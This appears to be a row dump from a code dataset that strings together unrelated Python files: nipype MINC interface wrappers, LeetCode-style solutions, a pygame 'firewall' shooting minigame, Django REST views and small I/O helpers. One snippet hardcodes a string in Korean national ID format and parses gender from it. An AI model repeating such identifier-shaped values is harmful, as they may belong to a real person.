>>> linreg.run() # doctest: +SKIP
"""
input_spec = BestLinRegInputSpec
output_spec = BestLinRegOutputSpec
_cmd = "bestlinreg"
class NlpFitInputSpec(CommandLineInputSpec):
source = File(
desc="source Minc file", exists=True, mandatory=True, argstr="%s", position=-3
)
target = File(
desc="target Minc file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_xfm = File(desc="output xfm file", genfile=True, argstr="%s", position=-1)
# This is a dummy input.
input_grid_files = InputMultiPath(File, desc="input grid file(s)")
config_file = File(
desc="File containing the fitting configuration use.",
argstr="-config_file %s",
mandatory=True,
exists=True,
)
init_xfm = File(
desc="Initial transformation (default identity).",
argstr="-init_xfm %s",
mandatory=True,
exists=True,
)
source_mask = File(
desc="Source mask to use during fitting.",
argstr="-source_mask %s",
mandatory=True,
exists=True,
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
class NlpFitOutputSpec(TraitedSpec):
output_xfm = File(desc="output xfm file", exists=True)
output_grid = File(desc="output grid file", exists=True)
class NlpFit(CommandLine):
"""Hierarchial non-linear fitting with bluring.
This tool is part of the minc-widgets package:
https://github.com/BIC-MNI/minc-widgets/blob/master/nlpfit/nlpfit
Examples
--------
>>> from nipype.interfaces.minc import NlpFit
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data, nlp_config
>>> from nipype.testing import example_data
>>> source = nonempty_minc_data(0)
>>> target = nonempty_minc_data(1)
>>> source_mask = nonempty_minc_data(2)
>>> config = nlp_config
>>> initial = example_data('minc_initial.xfm')
>>> nlpfit = NlpFit(config_file=config, init_xfm=initial, source_mask=source_mask, source=source, target=target)
>>> nlpfit.run() # doctest: +SKIP
"""
input_spec = NlpFitInputSpec
output_spec = NlpFitOutputSpec
_cmd = "nlpfit"
def _gen_filename(self, name):
if name == "output_xfm":
output_xfm = self.inputs.output_xfm
if isdefined(output_xfm):
return os.path.abspath(output_xfm)
else:
return (
aggregate_filename(
[self.inputs.source, self.inputs.target], "nlpfit_xfm_output"
)
+ ".xfm"
)
else:
raise NotImplemented
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["output_xfm"] = os.path.abspath(self._gen_filename("output_xfm"))
assert os.path.exists(outputs["output_xfm"])
if "grid" in open(outputs["output_xfm"]).read():
outputs["output_grid"] = re.sub(
".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_xfm"]
)
return outputs
class XfmAvgInputSpec(CommandLineInputSpec):
input_files = InputMultiPath(
File(exists=True),
desc="input file(s)",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
)
# This is a dummy input.
input_grid_files = InputMultiPath(File, desc="input grid file(s)")
output_file = File(desc="output file", genfile=True, argstr="%s", position=-1)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# FIXME xor these:
avg_linear = traits.Bool(
desc="average the linear part [default].", argstr="-avg_linear"
)
avg_nonlinear = traits.Bool(
desc="average the non-linear part [default].", argstr="-avg_nonlinear"
)
ignore_linear = traits.Bool(
desc="opposite of -avg_linear.", argstr="-ignore_linear"
)
ignore_nonlinear = traits.Bool(
desc="opposite of -avg_nonlinear.", argstr="-ignore_nonline"
)
class XfmAvgOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
output_grid = File(desc="output grid file", exists=True)
class XfmAvg(CommandLine):
"""Average a number of xfm transforms using matrix logs and exponents.
The program xfmavg calls Octave for numerical work.
This tool is part of the minc-widgets package:
https://github.com/BIC-MNI/minc-widgets/tree/master/xfmavg
Examples
--------
>>> from nipype.interfaces.minc import XfmAvg
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data, nlp_config
>>> from nipype.testing import example_data
>>> xfm1 = example_data('minc_initial.xfm')
>>> xfm2 = example_data('minc_initial.xfm') # cheating for doctest
>>> xfmavg = XfmAvg(input_files=[xfm1, xfm2])
>>> xfmavg.run() # doctest: +SKIP
"""
input_spec = XfmAvgInputSpec
output_spec = XfmAvgOutputSpec
_cmd = "xfmavg"
def _gen_filename(self, name):
if name == "output_file":
output_file = self.inputs.output_file
if isdefined(output_file):
return os.path.abspath(output_file)
else:
return (
aggregate_filename(self.inputs.input_files, "xfmavg_output")
+ ".xfm"
)
else:
raise NotImplemented
def _gen_outfilename(self):
return self._gen_filename("output_file")
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["output_file"] = os.path.abspath(self._gen_outfilename())
assert os.path.exists(outputs["output_file"])
if "grid" in open(outputs["output_file"]).read():
outputs["output_grid"] = re.sub(
".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
)
return outputs
class XfmInvertInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(desc="output file", genfile=True, argstr="%s", position=-1)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
class XfmInvertOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
output_grid = File(desc="output grid file", exists=True)
class XfmInvert(CommandLine):
"""Invert an xfm transform file.
Examples
--------
>>> from nipype.interfaces.minc import XfmAvg
>>> from nipype.testing import example_data
>>> xfm = example_data('minc_initial.xfm')
>>> invert = XfmInvert(input_file=xfm)
>>> invert.run() # doctest: +SKIP
"""
input_spec = XfmInvertInputSpec
output_spec = XfmInvertOutputSpec
_cmd = "xfminvert"
def _gen_filename(self, name):
if name == "output_file":
output_file = self.inputs.output_file
if isdefined(output_file):
return os.path.abspath(output_file)
else:
return (
aggregate_filename([self.inputs.input_file], "xfminvert_output")
+ ".xfm"
)
else:
raise NotImplemented
def _gen_outfilename(self):
return self._gen_filename("output_file")
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["output_file"] = os.path.abspath(self._gen_outfilename())
assert os.path.exists(outputs["output_file"])
if "grid" in open(outputs["output_file"]).read():
outputs["output_grid"] = re.sub(
".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
)
return outputs
class BigAverageInputSpec(CommandLineInputSpec):
input_files = InputMultiPath(
File(exists=True),
desc="input file(s)",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_files"],
hash_files=False,
name_template="%s_bigaverage.mnc",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="--verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="--clobber",
usedefault=True,
default_value=True,
)
# FIXME Redumentary implementation, various parameters not implemented.
# TODO!
output_float = traits.Bool(
desc="Output files with float precision.", argstr="--float"
)
robust = traits.Bool(
desc=(
"Perform robust averaging, features that are outside 1 standard"
"deviation from the mean are downweighted. Works well for noisy"
"data with artifacts. see the --tmpdir option if you have a"
"large number of input files."
),
argstr="-robust",
)
# Should Nipype deal with where the temp directory is?
tmpdir = Directory(desc="temporary files directory", argstr="-tmpdir %s")
sd_file = File(
desc="Place standard deviation image in specified file.",
argstr="--sdfile %s",
name_source=["input_files"],
hash_files=False,
name_template="%s_bigaverage_stdev.mnc",
)
class BigAverageOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
sd_file = File(desc="standard deviation image", exists=True)
class BigAverage(CommandLine):
"""Average 1000's of MINC files in linear time.
mincbigaverage is designed to discretise the problem of averaging either
a large number of input files or averaging a smaller number of large
files. (>1GB each). There is also some code included to perform "robust"
averaging in which only the most common features are kept via down-weighting
outliers beyond a standard deviation.
One advantage of mincbigaverage is that it avoids issues around the number
of possible open files in HDF/netCDF. In short if you have more than 100
files open at once while averaging things will slow down significantly.
mincbigaverage does this via a iterative approach to averaging files and
is a direct drop in replacement for mincaverage. That said not all the
arguments of mincaverage are supported in mincbigaverage but they should
be.
This tool is part of the minc-widgets package:
https://github.com/BIC-MNI/minc-widgets/blob/master/mincbigaverage/mincbigaverage
Examples
--------
>>> from nipype.interfaces.minc import BigAverage
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> files = [nonempty_minc_data(i) for i in range(3)]
>>> average = BigAverage(input_files=files, output_float=True, robust=True)
>>> average.run() # doctest: +SKIP
"""
input_spec = BigAverageInputSpec
output_spec = BigAverageOutputSpec
_cmd = "mincbigaverage"
class ReshapeInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_reshape.mnc",
)
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# FIXME MANY options not implemented!
write_short = traits.Bool(desc="Convert to short integer data.", argstr="-short")
class ReshapeOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Reshape(CommandLine):
"""Cut a hyperslab out of a minc file, with dimension reordering.
This is also useful for rewriting with a different format, for
example converting to short (see example below).
Examples
--------
>>> from nipype.interfaces.minc import Reshape
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> input_file = nonempty_minc_data(0)
>>> reshape_to_short = Reshape(input_file=input_file, write_short=True)
>>> reshape_to_short.run() # doctest: +SKIP
"""
input_spec = ReshapeInputSpec
output_spec = ReshapeOutputSpec
_cmd = "mincreshape"
class VolSymmInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-3
)
trans_file = File(
desc="output xfm trans file",
genfile=True,
argstr="%s",
position=-2,
name_source=["input_file"],
hash_files=False,
name_template="%s_vol_symm.xfm",
keep_extension=False,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_vol_symm.mnc",
)
# This is a dummy input.
input_grid_files = InputMultiPath(File, desc="input grid file(s)")
verbose = traits.Bool(
desc="Print out log messages. Default: False.", argstr="-verbose"
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# FIXME MANY options not implemented!
fit_linear = traits.Bool(desc="Fit using a linear xfm.", argstr="-linear")
fit_nonlinear = traits.Bool(desc="Fit using a non-linear xfm.", argstr="-nonlinear")
# FIXME This changes the input/output behaviour of trans_file! Split into
# two separate interfaces?
nofit = traits.Bool(
desc="Use the input transformation instead of generating one.", argstr="-nofit"
)
config_file = File(
desc="File containing the fitting configuration (nlpfit -help for info).",
argstr="-config_file %s",
exists=True,
)
x = traits.Bool(desc="Flip volume in x-plane (default).", argstr="-x")
y = traits.Bool(desc="Flip volume in y-plane.", argstr="-y")
z = traits.Bool(desc="Flip volume in z-plane.", argstr="-z")
class VolSymmOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
trans_file = File(desc="xfm trans file", exists=True)
output_grid = File(
desc="output grid file", exists=True
) # FIXME Is exists=True correct?
class VolSymm(CommandLine):
"""Make a volume symmetric about an axis either linearly
and/or nonlinearly. This is done by registering a volume
to a flipped image of itself.
This tool is part of the minc-widgets package:
https://github.com/BIC-MNI/minc-widgets/blob/master/volsymm/volsymm
Examples
--------
>>> from nipype.interfaces.minc import VolSymm
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> input_file = nonempty_minc_data(0)
>>> volsymm = VolSymm(input_file=input_file)
>>> volsymm.run() # doctest: +SKIP
"""
input_spec = VolSymmInputSpec
output_spec = VolSymmOutputSpec
_cmd = "volsymm"
def _list_outputs(self):
outputs = super()._list_outputs()
# Have to manually check for the grid files.
if os.path.exists(outputs["trans_file"]):
if "grid" in open(outputs["trans_file"]).read():
outputs["output_grid"] = re.sub(
".(nlxfm|xfm)$", "_grid_0.mnc", outputs["trans_file"]
)
return outputs
|
23,430 | f54bac4532178113172708ce433ddcb373128a81 | class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or numRows > len(s):
return s
rows = ["" for _ in range(numRows)]
cur, step = 0, 1
for c in s:
rows[cur] += c
cur += step
if cur == 0 or cur == numRows - 1:
step = step * -1
return "".join(rows)
|
23,431 | a77074ceb9cf6719f34536aaf624de25c4616177 | import datetime
import json
class EDiscussion:
def create_from_discussion(self, discussion):
self.channel = discussion.chat.title
self.text = discussion.text
self.user = discussion.from_user.first_name
self.date = datetime.datetime.fromtimestamp(discussion.date).strftime('%Y-%m-%d')
return self
def create_from_attributes(self, attrs):
self.channel = attrs[0]
self.text = attrs[1]
self.user = attrs[2]
self.date = attrs[3]
return self |
23,432 | 6c7f28194a544de61bc3bbb85336a6a20667cfb6 | to_int = {'I' : 1,
'V' : 5,
'X' : 10,
'L' : 50,
'C' : 100,
'D' : 500,
'M' : 1000
}
# IV -> smaller, larger -> return larger - smaller
# XI -> larger, smaller -> return larger + smaller -> add the first, then
# vv
def roman_to_int(roman):
if len(roman) == 1:
return to_int[roman]
elif len(roman) < 1:
return -1
current_ptr = 0
next_ptr = 1
# return value initialize
res = 0
# case 0: when the next_ptr >= len(roman): return current_ptr
while True:
if current_ptr >= len(roman):
return res
elif next_ptr >= len(roman) and current_ptr < len(roman):
res += to_int[roman[current_ptr]]
current_ptr += 1
# case 1: when current_ptr > next_ptr -> just add to the result the value at the current_ptr, move current_ptr one step forward and the next_ptr another step forward
elif to_int[roman[current_ptr]] >= to_int[roman[next_ptr]]:
res += to_int[roman[current_ptr]]
current_ptr += 1
next_ptr += 1
# case 2: when current_ptr < next_ptr -> temp = next_ptr - current_ptr; res += temp; current_ptr = next_ptr + 1; next_ptr = next_ptr + 2
elif to_int[roman[current_ptr]] < to_int[roman[next_ptr]]:
temp = to_int[roman[next_ptr]] - to_int[roman[current_ptr]]
res += temp
current_ptr += 2
next_ptr += 2
return res
roman = 'CCCXLII'
print (roman_to_int(roman))
# <<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def int_to_roman (integer):
parts = []
for letter, value in TABLE:
while value <= integer:
integer -= value
parts.append(letter)
return ''.join(parts)
TABLE=[['M',1000],['CM',900],['D',500],['CD',400],['C',100],['XC',90],['L',50],['XL',40],['X',10],['IX',9],['V',5],['IV',4],['I',1]]
a = 342
print (int_to_roman(a))
# integer = 342
# 342 - 100 = 242 -> C |
23,433 | b28b80cec7920968693a71b4e0db991e64c03187 | import Character
import pygame, random, time
from pygame.locals import *
class Hacker(Character.Character):
className = 'Hacker'
goal = 'hack into the interwebs and steal digital information.'
abilityDefinition = 'break through the opposing firewall.'
minigameName = '1337 hax'
abilSuccess = 'You successfully hack your target.'
abilLoss = 'You fail to hack your target.'
gamePoints = 0
playerNumber = -1
timeLimit = 50 # time limit for the minigame, feel free to change as needed.
image = 'Hacker.png'
def minigame(self, window, t):
minigameWon = False
minigameLost = False
startTime = time.clock()
pygame.init()
window = pygame.display.set_mode((1200,800))
pygame.display.set_caption('Firewall fight')
white = [255,255,255]
gray = [130,130,130]
black = [0,0,0]
rd = [255,0,0]
red = [255, 100, 0]
green = [0,255,0]
blue = [0,0,255]
wall = [600,200]
fwW = 300
fwH = 150
dFw = []
fwAtt = []
player = [600, 615]
attackTime = 0
fwDMove = 0
fwMoveTime = 0
fwTime = time.clock() + 1
fwAttTime = time.clock() + 1
fwGval = 100
fwGval = 0
attacks = []
attTi = time.clock() + .02
lines = []
nextTime = False
for i in range(16):
lines.append([0,0,0,0,255,0,0])
hp = 24
tP = 0
ended = False
lIsPressed = False
rIsPressed = False
spHeld = False
while not minigameWon and not minigameLost:
events = pygame.event.get()
for event in events:
if event.type == QUIT:
ended = True
break
if event.type == KEYUP:
if event.key == K_LEFT:
lIsPressed = False
if event.key == K_RIGHT:
rIsPressed = False
if event.key == K_SPACE:
spHeld = False
tP = 0
if event.type == KEYDOWN:
if event.key == K_LEFT:
lIsPressed = True
if event.key == K_RIGHT:
rIsPressed = True
if event.key == K_SPACE:
spHeld = True
if attackTime < time.clock():
attacks.append((player[0], player[1]-25))
attackTime = time.clock() + .7
tP = time.clock()
if spHeld:
if attackTime < time.clock():
attackTime = time.clock()+.7
attacks.append((player[0],player[1]-20))
if tP < time.clock():
tP = time.clock()+.05
if rIsPressed:
player[0] += 5
if lIsPressed:
player[0] -= 5
if fwDMove < time.clock():
fwDMove = time.clock() + 8
xVal = 8
yVal = 6
minVal = 3
if time.clock() > startTime + 35:
xVal = 12
yVal = 10
minVal = 6
dx = random.randint(-xVal,xVal)
dy = random.randint(-yVal,yVal)
while abs(dx) < minVal:
dx = random.randint(-xVal,xVal)
while abs(dy) < minVal:
dy = random.randint(-yVal,yVal)
dFw = [dx, dy]
if fwMoveTime < time.clock():
fwMoveTime = time.clock() + .03
wall = [wall[0] + dFw[0], wall[1] + dFw[1]]
if wall[0] <= fwW/2:
wall[0] = fwW/2
dFw[0] = -dFw[0]
if wall[0] >= 1200-fwW/2:
wall[0] = 1200-fwW/2
dFw[0] = -dFw[0]
if wall[1] >= 400-fwH/2:
wall[1] = 400-fwH/2
dFw[1] = -dFw[1]
if wall[1] <= 60+fwH/2:
wall[1] = 60+fwH/2
dFw[1] = -dFw[1]
if nextTime:
lines[i][0] = lines[i][0] + dFw[0]
lines[i][1] = lines[i][1] + dFw[1]
lines[i][2] = lines[i][2] + dFw[0]
lines[i][3] = lines[i][3] + dFw[1]
nextTime = not nextTime
else:
for i in range(len(lines)):
fwGval = random.randint(20,120)
fwBval = random.randint(0,20)
lines[i][0] = random.randint(wall[0]-10-fwW/2, wall[0]+10+fwW/2)
lines[i][1] = random.randint(wall[1]-10-fwH/2, wall[1]+10+fwH/2)
lines[i][2] = random.randint(wall[0]-10-fwW/2, wall[0]+10+fwW/2)
lines[i][3] = random.randint(wall[1]-10-fwH/2, wall[1]+10+fwH/2)
lines[i][5] = random.randint(0,100)
lines[i][6] = random.randint(0,30)
nextTime = not nextTime
if fwTime < time.clock(): #spawn rate of fireballs
x = .5
if time.clock() > startTime + 20:
x = .4
if time.clock() > startTime + 35:
x = .3
fwTime = time.clock()+x
spawnY = wall[1]+(fwH/2) + 5
attDX = (player[0]-wall[0])//random.randint(64,72)
attDY = (player[1]-spawnY)//random.randint(64,72)
fwAtt.append([wall[0], spawnY, int(attDX), int(attDY)])
if player[0] <= 5:
player[0] = 5
if player[0] >= 1195:
player[0] = 1195
window.fill(black)
if fwAttTime < time.clock():#move speed of fireballs
x = .04
if time.clock() > startTime + 20:
x = .03
if time.clock() > startTime + 35:
x = .02
fwAttTime = time.clock() + x
for i in range(len(fwAtt)):
if fwAtt[i][1] > 800:
del fwAtt[i]
break
for i in range(len(fwAtt)):
fwAtt[i][0] = fwAtt[i][0]+fwAtt[i][2]
fwAtt[i][1] = fwAtt[i][1]+fwAtt[i][3]
if fwAtt[i][0] >= player[0]-8 and fwAtt[i][0] <= player[0]+8 and fwAtt[i][1] >= player[1]-10 and fwAtt[i][1] <= player[1]+10:
minigameLost = True
if time.clock() > attTi:
attTi = time.clock() + .03
for i in range(len(attacks)):
if attacks[i][1] < 60:
del attacks[i]
break
for i in range(len(attacks)):
attacks[i] = (attacks[i][0], attacks[i][1]-5)
if attacks[i][1] <= wall[1]+fwH/2 and attacks[i][1] >= wall[1]-fwH and attacks[i][0] >= wall[0]-fwW/2 and attacks[i][0] <= wall[0]+fwW/2:
hp -= 1
del attacks[i]
break
for i in range(len(attacks)):
pygame.draw.circle(window, blue, attacks[i], 5)
for i in range(len(fwAtt)):
pygame.draw.circle(window, rd, (int(fwAtt[i][0]), int(fwAtt[i][1])), 3)
pygame.draw.line(window, rd, (fwAtt[i][0],fwAtt[i][1]), (fwAtt[i][0]-2*fwAtt[i][2], fwAtt[i][1]-3*fwAtt[i][3]), 3)
pygame.draw.rect(window, rd, (0,0,1200,60))
pygame.draw.rect(window, green, (0,0, hp*(1200/24),60))
pygame.draw.polygon(window,white,((player[0],player[1]-15),(player[0]-10, player[1]+10), (player[0]+10,player[1]+10)),0)
pygame.draw.rect(window, (255, fwGval, fwBval), (wall[0]-fwW/2, wall[1]-fwH/2, fwW, fwH))
for i in range(len(lines)):
pygame.draw.line(window, (lines[i][4],lines[i][5],lines[i][6]), (lines[i][0],lines[i][1]), (lines[i][2],lines[i][3]), random.randint(1,5))
font = pygame.font.Font(None, 28)
text = font.render(str(int(self.timeLimit+startTime-time.clock())), 1, black)
txt = font.render('Use the arrowkeys to move and the spacebar to fire.', 1, black)
window.blit(txt, (8,8))
window.blit(text, (1165,8))
pygame.display.update()
if hp == 0:
minigameWon = True
if time.clock()-startTime >= self.timeLimit:
minigameLost = True
if ended:
pygame.display.quit()
break
if minigameWon or minigameLost:
self.showEndScreen(window, minigameWon, t)
def showRules(self, window, t = 5):
pygame.init()
for i in range(t):
window = pygame.display.set_mode([1200,800])
pygame.display.set_caption("")
window.fill([0,0,0])
font = pygame.font.Font(None, 36)
goal = 'Your objective is to ' + self.getAbilityDefinition()
text1 = font.render(goal, 1, (255,255,255))
countdown = font.render('Minigame starting in: ' + str(t-i) , 1, (255,255,255))
window.blit(text1, (8,8))
window.blit(countdown, (8, 100))
pygame.display.update()
time.sleep(1)
self.minigame(window, t)
def showEndScreen(self, window, hasWon, t):
self.won = hasWon
if hasWon:
words = self.getMinigameWinText()
else:
words = self.getMinigameLossText()
for i in range(t):
window = pygame.display.set_mode([1200,800])
pygame.display.set_caption("")
window.fill((0,0,0))
font = pygame.font.Font(None, 36)
text = font.render(words, 1, (255,255,255))
countdown = font.render('Returning to the main game in: ' + str(t-i) , 1, (255,255,255))
window.blit(text, (8,8))
window.blit(countdown, (8, 100))
pygame.display.update()
time.sleep(1)
#b = pygame.display.set_mode([1,1])
#a = Hacker(1)
#a.showRules(b) |
23,434 | e4c8aa0711e9e0de3bb0afe69158fd4d4b6304e5 | pin="881120-1068234"
splitted = pin.split("-")
yyyymmdd = splitted[0]
num = splitted[1]
print(yyyymmdd)
print(num)
genderNum = num[0]
def decideGender(num):
if genderNum == "1":
print('male')
elif genderNum == "2":
print('female')
decideGender(genderNum)
|
23,435 | fd6e68e6c1f5e43830d1eb27d1286a28edc6ab19 | # coding=utf-8
import json
import sys
import subprocess
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ViewDoesNotExist, ObjectDoesNotExist
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, permissions
from rest_framework.response import Response
from rest_framework.decorators import detail_route, list_route
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from rest_framework_extensions.mixins import PaginateByMaxMixin
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView, GenericAPIView
from .filters import (AjaxDatatableOrderingFilter,
AjaxDatatablePagination,
AjaxDatatableSearchFilter,
pk_in_filter_factory)
def get_app_model_name(kwargs):
app_name = kwargs.get('app_name').lower()
model_name = kwargs.get('model_name').lower()
return app_name, model_name
def get_model_content_type(app_name, model_name):
try:
return ContentType.objects.get(app_label=app_name, model=model_name)
except ObjectDoesNotExist:
raise ViewDoesNotExist('No model found.')
class ContentTypeObjectView(GenericAPIView):
model = None
@property
def app_name(self):
if self.model:
return self.model._meta.app_label
else:
raise ViewDoesNotExist
@property
def model_name(self):
if self.model:
return self.model._meta.model_name
else:
raise ViewDoesNotExist('No model found.')
def get_model(self):
if not self.model:
app_name = self.kwargs.get('app_name').lower()
model_name = self.kwargs.get('model_name').lower()
try:
model_content_type = ContentType.objects.get(app_label=app_name, model=model_name)
except ObjectDoesNotExist:
raise ViewDoesNotExist
self.model = model_content_type.model_class()
def get_serializer_class(self):
if getattr(self, 'serializer_class', None):
return self.serializer_class
self.get_model()
serialize_name = self.model.__name__ + 'Serializer'
module_str = 'core.%s.serializers' % self.app_name
if module_str not in sys.modules:
module_str = 'apps.%s.serializers' % self.app_name
serializer_module = sys.modules[module_str]
self.serializer_class = getattr(serializer_module, serialize_name)
return self.serializer_class
def get_queryset(self):
self.get_model()
self.serializer_class = self.get_serializer_class()
self.queryset = self.model.objects.all()
self.filter_fields = getattr(self.model.Config, 'filter_fields', ())
self.search_fields = getattr(self.model.Config, 'search_fields', ())
q = super(ContentTypeObjectView, self).get_queryset()
if hasattr(self.model.Config, 'filter_queryset'):
q = self.model.Config.filter_queryset(self.request, q)
return q
class CommonListCreateAPIView(ListCreateAPIView, ContentTypeObjectView):
filter_backends = (DjangoFilterBackend,
filters.SearchFilter,
filters.OrderingFilter)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class CommonRetrieveUpdateAPIView(RetrieveUpdateDestroyAPIView, ContentTypeObjectView):
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
class AjaxDatableView(object):
""" status and page endpoint for ajax mode datatable """
def get_model(self):
if hasattr(self, 'queryset'):
return getattr(self, 'queryset').model
elif hasattr(self, 'model'):
return getattr(self, 'model')
else:
raise ImproperlyConfigured('Can\'t get model for viewset')
@list_route()
def status(self, request, *args, **kwargs):
self.filter_class = pk_in_filter_factory(self.get_model())
return super(AjaxDatableView, self).list(self, request, *args, **kwargs)
@list_route()
def page(self, request, *args, **kwargs):
""" pagination for ajax mode dataTable """
self.pagination_class = AjaxDatatablePagination
# get all events for channel
self.filter_backends = getattr(self, 'filter_backends', []) + [AjaxDatatableOrderingFilter,
AjaxDatatableSearchFilter]
queryset = self.get_queryset()
records_total = queryset.count() # get total count
queryset = self.filter_queryset(queryset)
records_filtered_total = queryset.count() # get filtered count
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
else:
serializer = self.get_serializer(queryset, many=True)
result = {
"draw": request.query_params.get('draw', 0),
"recordsTotal": records_total,
"recordsFiltered": records_filtered_total,
"data": [],
"error": ""
}
result['data'] = serializer.data
return Response(result)
class CommonViewSet(PaginateByMaxMixin, ModelViewSet):
""" provide list/retrive/patch/delete restful api for model """
max_paginate_by = 200
filter_backends = (DjangoFilterBackend,
filters.SearchFilter,
filters.OrderingFilter)
# subclass implement below to specify permission for acitons
# permissions_map = {
# 'retrieve': [CommonAPIPermissions],
# 'create': [CommonAPIPermissions],
# 'list': [CommonAPIPermissions],
# 'update': [CommonAPIPermissions],
# 'delete': [CommonAPIPermissions], # customized action below
# 'destroy': [CommonAPIPermissions],
# }
def get_permissions(self):
if hasattr(self, 'permissions_map'):
if self.action.lower() in self.permissions_map:
self.permission_classes = self.permissions_map[self.action]
return super(CommonViewSet, self).get_permissions()
@list_route(methods=['post', 'delete'])
def delete(self, request, pk=None):
""" for batch delete """
pk = request.POST.get('pk')
pk = pk.split(',')
queryset = self.filter_queryset(self.get_queryset())
queryset = queryset.filter(pk__in=pk)
if queryset.count():
queryset.delete()
else:
data = {'detail': 'Object not found, or permission denied.'}
return Response(data, status=404)
return JsonResponse({'success': True}, status=200)
@list_route(methods=['post', 'get'])
def page(self, request):
""" pagenation api for jquery.dataTable """
draw = request.GET.get('draw', 0)
length = int(request.GET.get('length', 5))
start = int(request.GET.get('start', 0))
order_column = int(request.GET.get('order[0][column]', 0))
order_direction = request.GET.get('order[0][dir]', 'asc')
search_keyword = request.GET.get('search[value]', '')
raise NotImplementedError
class GitCommitInfoView(APIView):
permission_classes = (permissions.AllowAny,)
def get(self, request, *args, **kwargs):
data = subprocess.check_output(
['git', 'show', '-s', '--date=iso8601', '--format=\'{"commit": "%h", "date": "%ad", "comment": "%s"}\''])
commit = data.decode("utf-8").strip().strip('\'')
return Response(json.loads(commit))
|
23,436 | 14c7b8d0c4378689215fb0597940cb7cb6055148 | import numpy as np
class BaseLoader:
def __init__(self, filename):
self.file = open(filename, "r")
self.parse()
self.close()
def _readline(self):
return self.file.readline().rstrip('\n')
def _readlines(self, n):
return list(map(lambda x: self._readline(), range(n)))
def _readlinesAndSplit(self, n):
return list(map(lambda x: self._readline().split(), range(n)))
def _loadIntegers(self):
return list(map(lambda x: int(x), self._readline().split()))
def _loadIntegerMatrix(self, n):
return list(map(
lambda x: list(map(
lambda y: int(y), self._readline().split()
)),
range(n)
))
def _toNumpyArray(self, data, dtype=str):
return np.array(data, dtype=dtype)
def parse(self):
pass
def close(self):
self.file.close()
class Loader(BaseLoader):
def parse(self):
self.N = self._loadIntegers()[0]
# self.photos = self._readlinesAndSplit(self.N)
self.matrix = self._loadIntegerMatrix(self.N)
# self.photos = self._toNumpyArray(self.photos, [('type', str), ('tag_count', int), ('tags', list)])
class Writer:
def __init__(self, filename):
self.file = open(filename, "w+")
def writeSlidesLength(self, length):
self.file.write(str(length) + "\n")
def writeVerticalsAndHorizontals(self, verticals, horizontals):
for v in verticals:
self.file.write(str(v[0]) + " " + str(v[1]) + "\n")
for h in horizontals:
self.file.write(str(h) + "\n")
def close(self):
self.file.close()
if __name__ == '__main__':
example = Loader("files/a_example.in")
# print(example.photos)
|
23,437 | 6349032661bd87fee2b6c63351ee54db4ef98c03 | import os
import numpy as np
import argparse
if __name__ == "__main__":
# python convert_dataset.py -d results_single_top -name Garr199905
parser = argparse.ArgumentParser(description='Parse file and create plots')
parser.add_argument('-f1', help='File where the topologies are stored', type=str, required=True, nargs='+')
parser.add_argument('-name', help='Topology name', type=str, required=True, nargs='+')
args = parser.parse_args()
